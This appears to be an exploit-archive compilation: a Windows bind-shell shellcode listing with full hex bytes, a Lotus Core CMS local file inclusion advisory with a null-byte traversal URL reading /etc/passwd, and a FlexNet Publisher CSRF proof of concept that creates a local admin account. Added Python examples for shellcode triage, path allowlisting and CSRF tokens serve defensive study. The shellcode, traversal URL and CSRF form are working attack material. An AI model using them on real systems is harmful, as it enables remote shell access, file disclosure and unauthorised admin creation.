; [ebp-0x2c] = Address New Socket Handle onto Stack 0x2c=44
; [ebp-0x30] = Address of sockaddr_in struct onto Stack 0x30=48
; [ebp-0x34] = Address of bind onto Stack 0x34=52
; [ebp-0x38] = Address of listen() onto Stack 0x38=56
; [ebp-0x3c] = Address of accept() onto Stack 0x3c=60
; [ebp-0x40] = Handle to clientSocket, returned from accept(), onto Stack 0x40=64
; [ebp-0x44] = PTR to String "cmd",0x00 on stack 0x44=68
; [ebp-0x48] = Pointer to PROCESS_INFORMATION struct onto Stack 0x48=72
; [ebp-0x4c] = Pointer to STARTUP_INFO struct onto Stack 0x4c=76
; [ebp-0x50] = Address of CreateProcessA onto Stack 0x50=80
; [ebp-0x54] = Address of ExitProcess onto Stack 0x54=84
# Compiled on Kali with nasm
;root@kali# nasm -f win32 bindShell.asm -o bindShell.o
; for i in $(objdump -D bindShell.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
# Preformatted for the lazy
;shellcode = "\x55\x89\xe5\x83\xec\x60\x31\xc0\x66\xb8\x73\x73\x50\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65"
;shellcode += "\x74\x50\x89\x65\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x40\x1c\x89\xc3\x8b\x03\x89\xc3\x8b\x03\x8b"
;shellcode += "\x40\x08\x89\x45\xf8\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf4\x8b\x4b\x24"
;shellcode += "\x01\xc1\x89\x4d\xf0\x8b\x53\x1c\x01\xc2\x89\x55\xec\x8b\x53\x14\x31\xc0\x8b\x7d\xf4\x8b\x75\xfc\x31\xc9"
;shellcode += "\xfc\x8b\x3c\x87\x03\x7d\xf8\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf0\x8b\x55\xec"
;shellcode += "\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xf8\x89\x45\xe8\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72"
;shellcode += "\x68\x4c\x6f\x61\x64\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xe4\x31\xc0\x66\xb8\x33\x32\x50\x68\x77"
;shellcode += "\x73\x32\x5f\x54\x8b\x5d\xe4\xff\xd3\x89\x45\xe0\x31\xd2\x66\xba\x75\x70\x52\x68\x74\x61\x72\x74\x68\x57"
;shellcode += "\x53\x41\x53\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xdc\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\x8b"
;shellcode += "\x45\xdc\xff\xd0\x31\xd2\x66\xba\x74\x41\x52\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\xff\x75\xe0\x8b"
;shellcode += "\x45\xe8\xff\xd0\x89\x45\xd8\x31\xdb\x53\x53\x53\x31\xc9\xb1\x06\x51\x43\x53\x43\x53\x8b\x45\xd8\xff\xd0"
;shellcode += "\x89\x45\xd4\x31\xdb\x53\x66\x68\x11\x5c\x80\xc3\x02\x66\x53\x89\x65\xd0\x31\xc9\x51\x68\x62\x69\x6e\x64"
;shellcode += "\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xcc\x6a\x10\xff\x75\xd0\xff\x75\xd4\x8b\x45\xcc\xff\xd0\x31"
;shellcode += "\xc9\x66\xb9\x65\x6e\x51\x68\x6c\x69\x73\x74\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xc8\x31\xc9\x51"
;shellcode += "\xff\x75\xd4\x8b\x45\xc8\xff\xd0\x31\xc9\x66\xb9\x70\x74\x51\x68\x61\x63\x63\x65\x54\xff\x75\xe0\x8b\x45"
;shellcode += "\xe8\xff\xd0\x89\x45\xc4\x31\xc9\x51\x51\xff\x75\xd4\x8b\x45\xc4\xff\xd0\x89\x45\xc0\xba\x63\x63\x6d\x64"
;shellcode += "\xc1\xea\x08\x52\x89\x65\xbc\x31\xd2\x83\xec\x10\x89\x65\xb8\x31\xd2\xff\x75\xc0\xff\x75\xc0\xff\x75\xc0"
;shellcode += "\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x44\x50\x89"
;shellcode += "\x65\xb4\x31\xd2\x66\xba\x73\x41\x52\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\xff"
;shellcode += "\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xb0\x31\xd2\xff\x75\xb8\xff\x75\xb4\x52\x52\x52\x31\xc0\x40\x50\x52"
;shellcode += "\x52\xff\x75\xbc\x52\x8b\x5d\xb0\xff\xd3\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63"
;shellcode += "\x68\x45\x78\x69\x74\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xac\x31\xd2\x50\x8b\x45\xac\xff\xd0"
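Once a blob like the hex string above lands in an alert, the first question for whoever triages it is which imports it resolves, and the pushed-immediate strings answer that without running anything. The Python below is an added example, not part of the original listing: it embeds the hex dump above verbatim, walks it with a small length decoder for the x86 subset this shellcode uses, and rebuilds each name from the `push imm32` / `mov reg, imm` runs. The decoder is there for a reason that is easy to miss: a plain byte scan would take the 0xb8 displacement in `mov [ebp-0x48], esp` (`89 65 b8`) for a `mov eax, imm32` opcode and emit garbage, so instruction boundaries have to be respected. The opcode tables cover only what this listing uses and raise on anything else; all function and constant names are the example's own.

```python
"""Added triage example, not part of the original listing: recover the API
names that the bind shell above pushes onto the stack before each
GetProcAddress / LoadLibraryA call. Input is the hex dump above, copied
verbatim; everything else is stdlib Python with no external dependency."""

# Bytes of the listing above, one string per source line of the hex dump.
BIND_SHELL_HEX = (
    "5589e583ec6031c066b8737350686464726568726f6341684765"
    "74508965fc31c0648b40308b400c8b401c89c38b0389c38b038b"
    "40088945f88b583c01c38b5b7801c38b7b2001c7897df48b4b24"
    "01c1894df08b531c01c28955ec8b531431c08b7df48b75fc31c9"
    "fc8b3c87037df86683c10ff3a674054039d072e48b4df08b55ec"
    "668b04418b04820345f88945e831d2526861727941684c696272"
    "684c6f616454ff75f88b45e8ffd08945e431c066b83332506877"
    "73325f548b5de4ffd38945e031d266ba75705268746172746857"
    "53415354ff75e08b45e8ffd08945dc31db66bb900129dc54538b"
    "45dcffd031d266ba744152686f636b65685753415354ff75e08b"
    "45e8ffd08945d831db53535331c9b10651435343538b45d8ffd0"
    "8945d431db536668115c80c30266538965d031c9516862696e64"
    "54ff75e08b45e8ffd08945cc6a10ff75d0ff75d48b45ccffd031"
    "c966b9656e51686c69737454ff75e08b45e8ffd08945c831c951"
    "ff75d48b45c8ffd031c966b9707451686163636554ff75e08b45"
    "e8ffd08945c431c95151ff75d48b45c4ffd08945c0ba63636d64"
    "c1ea08528965bc31d283ec108965b831d2ff75c0ff75c0ff75c0"
    "525231c040c1c00840505252525252525252525231c004445089"
    "65b431d266ba734152686f6365736874655072684372656154ff"
    "75f88b45e8ffd08945b031d2ff75b8ff75b452525231c0405052"
    "52ff75bc528b5db0ffd331c9b901657373c1e908516850726f63"
    "684578697454ff75f88b45e8ffd08945ac31d2508b45acffd0"
)

PREFIXES = {0x66, 0x64, 0xf3}                              # operand-size, FS segment, REP
ONE_BYTE = set(range(0x40, 0x60)) | {0xfc, 0xa6}           # inc/dec/push/pop reg, cld, cmpsb
IMM8 = {0x04, 0x6a, 0x72, 0x74}                            # add al,imm8; push imm8; jb/jz rel8
MODRM = {0x01, 0x03, 0x29, 0x31, 0x39, 0x89, 0x8b, 0xff}  # add/sub/xor/cmp/mov r/m; push/call r/m
MODRM_IMM8 = {0x80, 0x83, 0xc1}                            # add/sub/cmp r/m,imm8; rol/shr r/m,imm8

def modrm_length(code, j):
    """Bytes used by the ModRM at code[j] plus any SIB byte and displacement."""
    mod, rm = code[j] >> 6, code[j] & 7
    if mod == 3:
        return 1                                   # register operand, no memory reference
    n = 2 if rm == 4 else 1                        # rm == 4: a SIB byte follows
    if mod == 0 and (rm == 5 or (rm == 4 and code[j + 1] & 7 == 5)):
        n += 4                                     # disp32 with no base register
    return n + {1: 1, 2: 4}.get(mod, 0)            # disp8 / disp32

def decode(code, i):
    """(length, opcode, operand bytes) of the instruction at code[i]; raises on
    any opcode outside the subset this shellcode uses."""
    j, opsize16 = i, False
    while code[j] in PREFIXES:
        opsize16 = opsize16 or code[j] == 0x66
        j += 1
    op = code[j]
    j += 1
    if op in ONE_BYTE:
        n = 0
    elif op == 0x68 or 0xb8 <= op <= 0xbf:         # push imm / mov r32|r16, imm
        n = 2 if opsize16 else 4
    elif 0xb0 <= op <= 0xb7 or op in IMM8:         # mov r8, imm8 and the other imm8 forms
        n = 1
    elif op in MODRM:
        n = modrm_length(code, j)
    elif op in MODRM_IMM8:
        n = modrm_length(code, j) + 1
    else:
        raise ValueError(f"unsupported opcode {op:#x} at offset {i}")
    return j + n - i, op, code[j:j + n]

def extract_api_strings(code):
    """Each string is a run of push imm / mov reg, imm loads (push reg allowed in
    between). The tail is pushed first, so fragments are joined in reverse;
    'shr reg, 8' right after a load drops its low byte (the listing's trick for
    3-byte tails such as "ess" without a NUL inside the immediate)."""
    strings, frags = [], []

    def flush():
        if frags:
            text = b"".join(reversed(frags))
            strings.append("".join(chr(b) for b in text if 0x20 <= b < 0x7f))
            frags.clear()

    i = 0
    while i < len(code):
        length, op, operands = decode(code, i)
        if op == 0x68 or 0xb8 <= op <= 0xbf:
            if sum(0x20 <= b < 0x7f for b in operands) >= 2:
                frags.append(operands)
            else:
                flush()                            # numeric constant (port, size), not text
        elif op == 0xc1 and frags and (operands[0] >> 3) & 7 == 5 and operands[-1] == 8:
            frags[-1] = frags[-1][1:]              # shr reg, 8
        elif not 0x50 <= op <= 0x57:               # anything except push reg ends the run
            flush()
        i += length
    flush()
    return strings
```

`extract_api_strings(bytes.fromhex(BIND_SHELL_HEX))` returns the eleven names in resolution order, GetProcAddress through ExitProcess, which is the same picture the listing's own comments give, recovered from the bytes alone. The approach carries over to other hand-written shellcode that assembles names on the stack; encoded payloads must be decoded first, and a real disassembler (or capstone) replaces the toy decoder as soon as the opcode mix grows.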
Lotus Core CMS 1.0.1 Local File Inclusion
Lotus Core CMS version 1.0.1 suffers from a local file inclusion vulnerability.
641de06b076788171ff9f640f27f6e23
# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-01-31
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://lotuscore.sourceforge.net/
# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
# Version: 1.0.1
# Tested on: Windows 7 x86
# CVE : N/A
The vulnerability is on line 65 of index.php. The page_slug parameter defaults to index when it is not set; when the user supplies it via a GET or POST request,
the code checks whether the corresponding file exists and, if it does, includes it without any sanitization.
-----------------------------------------------------------------------------
if(!$_REQUEST['page_slug']){
$_REQUEST['page_slug'] = 'index';
}
if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
include('system/plugins/'.$_REQUEST['page_slug'].'.php');
}else{
include("system/plugins/error/404.php");
}
------------------------------------------------------------------------------
The PHP file appends .php to whatever is supplied as the page_slug parameter, so to include an arbitrary file the path must be truncated with a null byte (this only works on PHP versions that still honour a null byte in filesystem paths, i.e. before 5.3.4).
Note that you need to be authenticated to exploit this. The exploitation would look like this:
http://site:80/index.php?page_slug=../../../../../etc/passwd%00
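The fix, as an added Python stand-in for the PHP include above (not Lotus Core CMS code): two independent checks, an allowlist on `page_slug` applied before any filesystem call, and a containment check on the resolved path. The plugin directory and the `index.php` inside it are constructed in a temporary directory so the example runs offline; the function and constant names are the example's own.

```python
"""Added example, not Lotus Core CMS code: a Python stand-in for the include
above with the two checks it lacks. The plugin directory and its index.php are
constructed in a temp dir so this runs offline."""
import os
import re
import tempfile

SLUG_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")   # allowlist: what a legitimate plugin slug looks like

def validate_slug(page_slug):
    """Keep the original default ('' -> 'index'), then allowlist the value.
    Returns the slug or None. Both the ../ segments and the trailing %00 of the
    advisory's payload fail here, before any filesystem call is made (Python's
    os functions raise on an embedded NUL, so this ordering matters)."""
    if not page_slug:
        page_slug = "index"
    if "\x00" in page_slug or not SLUG_RE.fullmatch(page_slug):
        return None
    return page_slug

def resolve_plugin(plugins_dir, page_slug):
    """Path the safe equivalent of include('system/plugins/'.$slug.'.php') would
    load, or None. Independent second check: the resolved path must still lie
    inside plugins_dir, so a later loosening of the allowlist cannot reopen the hole."""
    slug = validate_slug(page_slug)
    if slug is None:
        return None
    root = os.path.realpath(plugins_dir)
    candidate = os.path.realpath(os.path.join(root, slug + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate if os.path.isfile(candidate) else None

def demo():
    """Feed constructed inputs, including the advisory's payload, through
    resolve_plugin; returns {input: accepted}."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = os.path.join(tmp, "system", "plugins")
        os.makedirs(plugins)
        with open(os.path.join(plugins, "index.php"), "w") as fh:
            fh.write("<?php // constructed stand-in for the real plugin file\n")
        inputs = ["", "index", "../../../../../etc/passwd\x00", "../index", "index\x00", "missing"]
        return {s: resolve_plugin(plugins, s) is not None for s in inputs}
```

The allowlist alone already closes the reported issue; the `realpath` containment check is the layer that survives the next developer widening the regex, and in the PHP original the same two steps would be a `preg_match` on `$_REQUEST['page_slug']` followed by a `realpath()` comparison against the plugin directory.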
FlexNet Publisher 11.12.1 Cross Site Request Forgery
FlexNet Publisher version 11.12.1 suffers from a cross site request forgery vulnerability.
b6c92c854634613708e0a09f3f56fb60
# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
# Date: 2019-12-29
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.flexerasoftware.com/
# Software : FlexNet Publisher
# Product Version: v11.12.1
# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm
# Vulnerability Type : Cross-Site Request Forgery (Add Local Admin)
# Vulnerability : Cross-Site Request Forgery
# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
# CVE : N/A
HTTP Request :
POST /users HTTP/1.1
Host: SERVER:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://SERVER:8888/users?event=create&licenseTab=
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Connection: close
Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
Upgrade-Insecure-Requests: 1
licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create
HTTP Response :
HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 08:38:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14434
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SERVER:8888/users" method="POST">
<input type="hidden" name="licenseTab" value="" />
<input type="hidden" name="selected" value="" />
<input type="hidden" name="userType" value="local-admin" />
<input type="hidden" name="userName" value="ISMAILTASDELEN" />
<input type="hidden" name="firstName" value="Ismail" />
<input type="hidden" name="lastName" value="Tasdelen" />
<input type="hidden" name="password2" value="Test12345" />
<input type="hidden" name="confirm" value="Test12345" />
<input type="hidden" name="accountType" value="admin" />
<input type="hidden" name="checksum" value="1d00c20815e84c31" />
<input type="hidden" name="Create" value="Create" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
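What the receiving handler was missing, as an added Python example (not FlexNet code): a synchronizer token bound to the session plus an origin check. `SERVER_SECRET`, the attacker origin and the helper names are placeholders; the request body and the `sess_lmgrd` value are the ones shown in the request above. Note that the PoC replays the `checksum` field unchanged, so whatever that field is, it is not doing the job of a per-session token.

```python
"""Added example, not FlexNet code: the server-side checks that would have
rejected the forged POST /users above. SERVER_SECRET, the attacker origin and
the legitimate-request construction are placeholders; the request body and
session id are the ones shown in the advisory."""
import hashlib
import hmac
from urllib.parse import parse_qs

SERVER_SECRET = b"constructed-placeholder-key"   # per-deployment key, never sent to the browser
SITE_ORIGIN = "http://SERVER:8888"               # origin of the legitimate UI, as in the advisory

# Body of the forged request from the advisory, verbatim.
POC_BODY = ("licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail"
            "&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin"
            "&checksum=1d00c20815e84c31&Create=Create")

def csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session id).
    The server embeds it in its own form; a page on another origin cannot read it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()

def create_user_allowed(headers, body, session_id):
    """True only when the POST comes from the site's own origin AND carries the
    token minted for this session; the PoC above satisfies neither."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return False                              # cross-site form post, or no origin information at all
    token = parse_qs(body, keep_blank_values=True).get("csrf_token", [""])[0]
    return hmac.compare_digest(token.encode(), csrf_token(session_id).encode())

def demo():
    """Run four constructed requests through the check; returns {case: accepted}."""
    session = "32CFC53815147D5362ACAAF100000001"  # sess_lmgrd value from the advisory's cookie
    same_site = {"Origin": SITE_ORIGIN}
    cross_site = {"Origin": "http://attacker.invalid"}   # constructed; the browser sets Origin, a page cannot forge it
    with_token = POC_BODY + "&csrf_token=" + csrf_token(session)
    return {
        "poc_as_posted": create_user_allowed(cross_site, POC_BODY, session),
        "same_origin_no_token": create_user_allowed(same_site, POC_BODY, session),
        "legitimate": create_user_allowed(same_site, with_token, session),
        "token_of_another_session": create_user_allowed(same_site, with_token, "constructed-other-session"),
    }
```

Only the legitimate case is accepted; the token fails both when absent and when it was minted for a different session, which is what stops a captured form from being replayed. Marking `sess_lmgrd` as `SameSite=Lax` adds a browser-enforced layer on top: the cookie then does not accompany a cross-site top-level POST at all, so the handler never sees an authenticated forged request in the first place.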